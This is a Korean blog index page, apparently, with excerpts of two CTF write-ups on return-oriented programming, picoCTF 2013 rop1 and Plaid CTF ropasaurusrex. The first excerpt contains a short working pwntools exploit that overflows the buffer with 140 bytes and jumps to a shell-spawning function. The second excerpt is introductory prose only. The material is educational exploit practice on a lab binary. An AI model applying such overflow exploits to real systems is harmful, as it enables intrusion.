ROP(8)
-
[pico CTF 2013] rop1
pico ctf rop1번 문제입니다. checksec 하고! 바이너리까보면 취약한 함수라고 손수 알려주는군요 ㅎㅎ88만큼받는데 무려..100을 ㅎㅎ BOF 어떻게 rop를 만들까 생각해보니까 마침 부르지말라는 곳에 shell호출하는 함수가 있네요! :) 그냥 exploit하죠!! 12345678910111213141516171819from pwn import * r = process("./pico_rop1")system = 0x080484A4 payload = "" payload += "A"*140payload += p32(system) r.send(payload)r.interactive() cs (grin)
2018.08.15 -
[plaid CTF] ropasaurusrex
첫번째로 현제 제기준에 조금은 난의도 있는문제를 write-up 쓰게 되었군요 ㅎ3일전까지만해도 ROP가 엄청 헷갈리고그랬는데 exploit-exercise fusion level02문제를풀면서 진짜 많이 도움이 되었던거 같아요 ㅎㅎ level3부터는 자료만들고 이것저것 겹친것들이많아서 조금 지연될 것 같지만 그래도 최대한 빨리 노력해서 풀어볼 예정입니다. (잔말그만하고 본론으로 들어갈게요) ropasaurusrex 문제는 저도 처음에 엄청 힘들어했었기 때문에 개념은 다 알려드리지 못하더라도 명령어와 풀이과정은 모두 알려드리도록 하겠습니다. xD 먼저 ropasaurusrex 바이너리파일을 다운받습니다. 그리고는 가장 먼저 하는일! IDA로 바이너리파일을 까고, 취약점이 어디인지 확인해봅니다! main에..
2018.08.14